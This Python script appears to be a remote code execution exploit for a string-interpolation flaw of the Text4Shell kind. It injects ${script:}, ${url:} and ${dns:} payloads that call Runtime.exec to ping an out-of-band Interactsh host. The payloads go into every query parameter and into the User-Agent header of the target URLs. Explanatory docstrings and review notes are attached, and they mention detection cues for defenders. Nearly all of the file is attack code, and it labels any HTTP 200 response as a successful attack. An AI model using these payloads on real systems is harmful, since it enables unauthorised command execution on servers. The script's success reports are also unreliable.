import argparse
import requests
from urllib.parse import urlparse, urlunparse, quote
class bcolors:
    """ANSI escape sequences used to colour the script's terminal output.

    Every attribute is a plain ``str`` that can be placed before text to change its
    colour/weight; ``ENDC`` resets the terminal back to its default attributes.
    """

    (
        HEADER,
        OKBLUE,
        OKCYAN,
        OKGREEN,
        WARNING,
        FAIL,
        ENDC,
        BOLD,
        UNDERLINE,
    ) = (
        '\033[95m',
        '\033[94m',
        '\033[96m',
        '\033[92m',
        '\033[93m',
        '\033[91m',
        '\033[0m',
        '\033[1m',
        '\033[4m',
    )
class Exploit:
    """Send ``${prefix:...}`` interpolation strings to each target and print the HTTP status.

    The payload strings use the ``${script:...}`` / ``${url:...}`` / ``${dns:...}``
    interpolator syntax (presumably aimed at a StringSubstitutor-style template engine
    on the server — confirm against the intended target). Two injection channels are
    tried per target: every query-string value, and the User-Agent header.

    The only "success" this class reports is an HTTP 200 response, which merely means
    the request was served; whether the string was interpolated is never verified here
    (``check`` is a stub). For defenders, the distinctive ``${script:``, ``${url:`` and
    ``${dns:`` prefixes in query strings or User-Agent values are the thing to alert on.
    """

    def __init__(self, host: str, targets: list[str], interactsh_host: str, proxy: str) -> None:
        """Store the connection details used by ``run``.

        Args:
            host: base URL including scheme; its scheme and netloc are reused for
                every request built in ``run``.
            targets: paths (optionally with a query string) relative to ``host``.
            interactsh_host: out-of-band listener name embedded in the payload command.
            proxy: proxy URL for plain-http requests; the CLI default is "" and is
                passed through unchanged.
        """
        self.host = host
        self.targets = targets
        self.proxy = proxy
        self.interactsh_host = interactsh_host

    def run(self) -> None:
        """Issue one GET per (target, payload, channel) and print a status-based outcome.

        Only the ``"http"`` proxy key is set, so https requests bypass ``proxy``.
        Responses with a status other than 200 or 404 produce no output at all.
        Network errors raised by ``requests`` are not caught and will abort the loop.
        """
        session = requests.Session()
        # Only plain-http traffic is proxied; no "https" entry is configured.
        session.proxies = {"http": self.proxy}
        # The command wrapped by every payload: a single out-of-band ping to the listener.
        command = f"ping -c 1 {self.interactsh_host}"
        # Three interpolator prefixes, each wrapping the same Runtime.exec() call.
        payloads = ["${script:javascript:java.lang.Runtime.getRuntime().exec('" + command + "')}",
                    "${url:UTF-8:java.lang.Runtime.getRuntime().exec('" + command + "')}",
                    "${dns:address:java.lang.Runtime.getRuntime().exec('" + command + "')}"]
        print(f"{bcolors.OKGREEN}[+] Payload generated{bcolors.ENDC}")
        # Scheme and netloc always come from --host; a target only contributes path/query.
        host_parser = urlparse(self.host)
        for target in self.targets:
            print(f"{bcolors.OKGREEN}[+] Attaching payload to {target}{bcolors.ENDC}")
            parsed_url = urlparse(target)
            if parsed_url.query:
                # NOTE(review): assigned but never read anywhere in this method.
                query_payload = [0] * len(payloads)
                for payload in payloads:
                    queries = parsed_url.query.split('&')
                    query_index = 0
                    # Replace the value of every query parameter with the payload,
                    # keeping the original parameter names.
                    while query_index < len(queries):
                        queries[query_index] = queries[query_index].split("=")[0] + "=" + payload
                        query_index += 1
                    query_param = "&".join(queries)
                    # '=' and '&' stay unescaped so the server still sees separate
                    # parameters; the params and fragment components are dropped.
                    url = urlunparse((host_parser.scheme, host_parser.netloc, parsed_url.path, '', quote(query_param,"=&"), ''))
                    response = session.get(url)
                    # A 200 only shows the request was served, not that the payload was
                    # interpolated or executed; other codes are silently ignored.
                    if response.status_code == 200:
                        print(f"{bcolors.OKGREEN}[+] Attack in query parameter Successful{bcolors.ENDC}")
                    elif response.status_code == 404:
                        print(f"{bcolors.OKGREEN}[-] Invalid Target{bcolors.ENDC}")
            for payload in payloads:
                # Second channel: the payload is sent as the User-Agent header.
                # quote() with safe="=" escapes everything except '=' and unreserved chars.
                header = {"User-Agent": quote(payload,"=")}
                # The target string is concatenated onto host verbatim (no re-parsing here).
                response = session.get(f"{self.host}{target}", headers=header)
                # Same status-only interpretation as above: 200 is not proof of execution.
                if response.status_code == 200:
                    print(f"{bcolors.OKGREEN}[+] Attack in User-Agent header Successful{bcolors.ENDC}")
                elif response.status_code == 404:
                    print(f"{bcolors.OKGREEN}[-] Invalid Target{bcolors.ENDC}")

    def check(self, file: str) -> None:
        """Placeholder with no behaviour.

        Presumably meant to confirm callbacks at ``interactsh_host`` (the CLI help
        describes that host as "used to validate") — confirm with the author. The
        caller currently passes the literal "todo".
        """
        pass
if __name__ == "__main__":
    # CLI entry point: build an Exploit from the arguments and run it once.
    parser = argparse.ArgumentParser()
    parser.add_argument("--host", "-u", required=True, help="Host Url with scheme", type=str)
    parser.add_argument("--input", "-i", help="full path of the file containing potential targets", type=str)
    parser.add_argument("--target", "-t", help="Path of the single target (without hostname)", type=str)
    parser.add_argument("--interactsh", "-v", required=True, help="Interactsh host - used to validate", type=str)
    # Defaults to "" which Exploit.run() stores as the "http" proxy entry unchanged.
    parser.add_argument("--proxy", "-p", help="Proxy details", default="", type=str)
    args = parser.parse_args()
    # Exactly one of --input / --target is expected; if both are given the
    # first branch is skipped and --target is used.
    if args.input and not args.target:
        # NOTE(review): the file handle is never closed; each line is passed to
        # Exploit unchanged.
        file = open(args.input)
        targets = file.readlines()
        exploit = Exploit(args.host, targets, args.interactsh, args.proxy)
        exploit.run()
        # check() is a no-op stub; the argument is a placeholder literal.
        exploit.check("todo")
    elif args.target:
        targets = [args.target]
        exploit = Exploit(args.host, targets, args.interactsh, args.proxy)
        exploit.run()
        # check() is a no-op stub; the argument is a placeholder literal.
        exploit.check("todo")
    else:
        print(f"{bcolors.FAIL}[-]Provide any and only one of --input and --target{bcolors.ENDC}")